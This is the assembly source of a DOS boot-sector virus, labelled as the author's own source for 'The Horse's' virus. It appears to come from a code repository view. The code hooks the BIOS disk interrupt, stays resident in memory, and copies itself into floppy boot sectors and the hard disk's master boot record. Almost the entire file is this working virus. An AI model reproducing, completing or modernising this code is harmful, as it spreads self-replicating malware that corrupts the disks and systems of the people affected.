2022-08-21 09:07:57 +00:00
|
|
|
|
;
|
|
|
|
|
; The Horse's boot sector virus
|
|
|
|
|
; This is an author's source
|
|
|
|
|
;
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
.radix 16
|
|
|
|
|
begin:
|
|
|
|
|
jmp start
|
|
|
|
|
|
|
|
|
|
my label word
|
|
|
|
|
|
|
|
|
|
db 'IBM 3.3'
|
|
|
|
|
dw 200
|
|
|
|
|
db 2
|
|
|
|
|
dw 1
|
|
|
|
|
db 2
|
|
|
|
|
dw 70
|
|
|
|
|
dw 2d0
|
|
|
|
|
db 0fdh
|
|
|
|
|
dw 2
|
|
|
|
|
dw 9
|
|
|
|
|
dw 2
|
|
|
|
|
dw 0
|
|
|
|
|
|
|
|
|
|
lee label word
|
|
|
|
|
|
|
|
|
|
virlen equ offset endcode-begin
|
|
|
|
|
|
|
|
|
|
start:
|
|
|
|
|
cld
|
|
|
|
|
sub ax,ax
|
|
|
|
|
mov ds,ax
|
|
|
|
|
mov bp,7c00
|
|
|
|
|
cli
|
|
|
|
|
mov ss,ax
|
|
|
|
|
mov sp,bp
|
|
|
|
|
sti
|
|
|
|
|
push ax
|
|
|
|
|
push bp
|
|
|
|
|
mov ax,[413]
|
|
|
|
|
push [13*4+2]
|
|
|
|
|
push [13*4]
|
|
|
|
|
pop word ptr [old13h+7c00-100]
|
|
|
|
|
pop word ptr [old13h+7c00-100+2]
|
|
|
|
|
dec ax
|
|
|
|
|
mov [413],ax
|
|
|
|
|
mov cl,6
|
|
|
|
|
shl ax,cl
|
|
|
|
|
mov es,ax
|
|
|
|
|
|
|
|
|
|
mov [13*4],offset int13h-100
|
|
|
|
|
mov [13*4+2],es
|
|
|
|
|
|
|
|
|
|
mov cx,virlen
|
|
|
|
|
sub di,di
|
|
|
|
|
mov si,bp
|
|
|
|
|
rep movsb
|
|
|
|
|
push es
|
|
|
|
|
mov ax,offset here-begin
|
|
|
|
|
push ax
|
|
|
|
|
retf
|
|
|
|
|
here:
|
|
|
|
|
sub ax,ax
|
|
|
|
|
mov es,ax
|
|
|
|
|
int 13
|
|
|
|
|
mov ax,0201
|
|
|
|
|
mov bx,bp
|
|
|
|
|
cmp byte ptr cs:[ident-100],0fdh
|
|
|
|
|
je from_disk
|
|
|
|
|
mov cx,0007
|
|
|
|
|
mov dx,0080
|
|
|
|
|
int 13
|
|
|
|
|
jmp exit
|
|
|
|
|
|
|
|
|
|
from_disk:
|
|
|
|
|
|
|
|
|
|
mov cx,2709
|
|
|
|
|
mov dx,0100
|
|
|
|
|
int 13
|
|
|
|
|
jc exit
|
|
|
|
|
push cs
|
|
|
|
|
push cs
|
|
|
|
|
pop es
|
|
|
|
|
pop ds
|
|
|
|
|
mov ax,0201
|
|
|
|
|
mov bx,0200
|
|
|
|
|
mov cx,0001
|
|
|
|
|
mov dx,0080
|
|
|
|
|
int 13
|
|
|
|
|
jc exit
|
|
|
|
|
call inf?
|
|
|
|
|
je exit
|
|
|
|
|
mov byte ptr [ident-100],0f8
|
|
|
|
|
mov ax,0301
|
|
|
|
|
mov bx,0200
|
|
|
|
|
mov cx,0007
|
|
|
|
|
mov dx,0080
|
|
|
|
|
int 13
|
|
|
|
|
jc exit
|
|
|
|
|
call move
|
|
|
|
|
mov ax,0301
|
|
|
|
|
sub bx,bx
|
|
|
|
|
mov cx,0001
|
|
|
|
|
int 13
|
|
|
|
|
exit:
|
|
|
|
|
mov byte ptr cs:[ident-100],0fdh
|
|
|
|
|
retf
|
|
|
|
|
int13h:
|
|
|
|
|
push ds
|
|
|
|
|
push ax
|
|
|
|
|
cmp dl,1
|
|
|
|
|
ja skip
|
|
|
|
|
cmp ah,2
|
|
|
|
|
jb skip
|
|
|
|
|
cmp ah,3
|
|
|
|
|
ja skip
|
|
|
|
|
sub ax,ax
|
|
|
|
|
mov ds,ax
|
|
|
|
|
mov al,[43f]
|
|
|
|
|
push dx
|
|
|
|
|
and ax,3
|
|
|
|
|
and dx,3
|
|
|
|
|
inc dl
|
|
|
|
|
test al,dl
|
|
|
|
|
pop dx
|
|
|
|
|
jne skip
|
|
|
|
|
call infect
|
|
|
|
|
skip:
|
|
|
|
|
pop ax
|
|
|
|
|
pop ds
|
|
|
|
|
do:
|
|
|
|
|
jmp dword ptr cs:[old13h-100]
|
|
|
|
|
|
|
|
|
|
infected?:
|
|
|
|
|
|
|
|
|
|
sub ax,ax
|
|
|
|
|
call ojoj
|
|
|
|
|
mov ax,0201
|
|
|
|
|
mov bx,0200
|
|
|
|
|
mov cx,0001
|
|
|
|
|
sub dh,dh
|
|
|
|
|
call ojoj
|
|
|
|
|
inf?:
|
|
|
|
|
mov si,offset start-100
|
|
|
|
|
mov di,offset start-100+200
|
|
|
|
|
mov cx,mbyte-start
|
|
|
|
|
rep cmpsb
|
|
|
|
|
return:
|
|
|
|
|
ret
|
|
|
|
|
infect:
|
|
|
|
|
push bx
|
|
|
|
|
push cx
|
|
|
|
|
push dx
|
|
|
|
|
push si
|
|
|
|
|
push di
|
|
|
|
|
push es
|
|
|
|
|
push cs
|
|
|
|
|
push cs
|
|
|
|
|
pop es
|
|
|
|
|
pop ds
|
|
|
|
|
cld
|
|
|
|
|
call infected?
|
|
|
|
|
je leave
|
|
|
|
|
mov ax,0301
|
|
|
|
|
mov bx,0200
|
|
|
|
|
mov cx,2709
|
|
|
|
|
mov dh,1
|
|
|
|
|
call ojoj
|
|
|
|
|
jc leave
|
|
|
|
|
call move
|
|
|
|
|
mov ax,0301
|
|
|
|
|
sub bx,bx
|
|
|
|
|
mov cx,0001
|
|
|
|
|
sub dh,dh
|
|
|
|
|
call ojoj
|
|
|
|
|
leave:
|
|
|
|
|
pop es
|
|
|
|
|
pop di
|
|
|
|
|
pop si
|
|
|
|
|
pop dx
|
|
|
|
|
pop cx
|
|
|
|
|
pop bx
|
|
|
|
|
ret
|
|
|
|
|
|
|
|
|
|
ojoj:
|
|
|
|
|
pushf
|
|
|
|
|
push cs
|
|
|
|
|
call do
|
|
|
|
|
ret
|
|
|
|
|
move:
|
|
|
|
|
mov di,offset my-100
|
|
|
|
|
mov si,offset my-100+200
|
|
|
|
|
mov cx,lee-my
|
|
|
|
|
rep movsb
|
|
|
|
|
mov di,offset usm-100
|
|
|
|
|
mov si,offset usm-100+200
|
|
|
|
|
mov cx,endcode-usm
|
|
|
|
|
rep movsb
|
|
|
|
|
ret
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
mbyte label word
|
|
|
|
|
|
|
|
|
|
old13h dd ?
|
|
|
|
|
ident db 0fdh
|
|
|
|
|
|
|
|
|
|
usm label word
|
|
|
|
|
|
|
|
|
|
db 135d dup (?)
|
|
|
|
|
|
|
|
|
|
db 55,0AA
|
|
|
|
|
|
|
|
|
|
endcode label word
|
|
|
|
|
|
2021-01-12 23:38:47 +00:00
|
|
|
|
|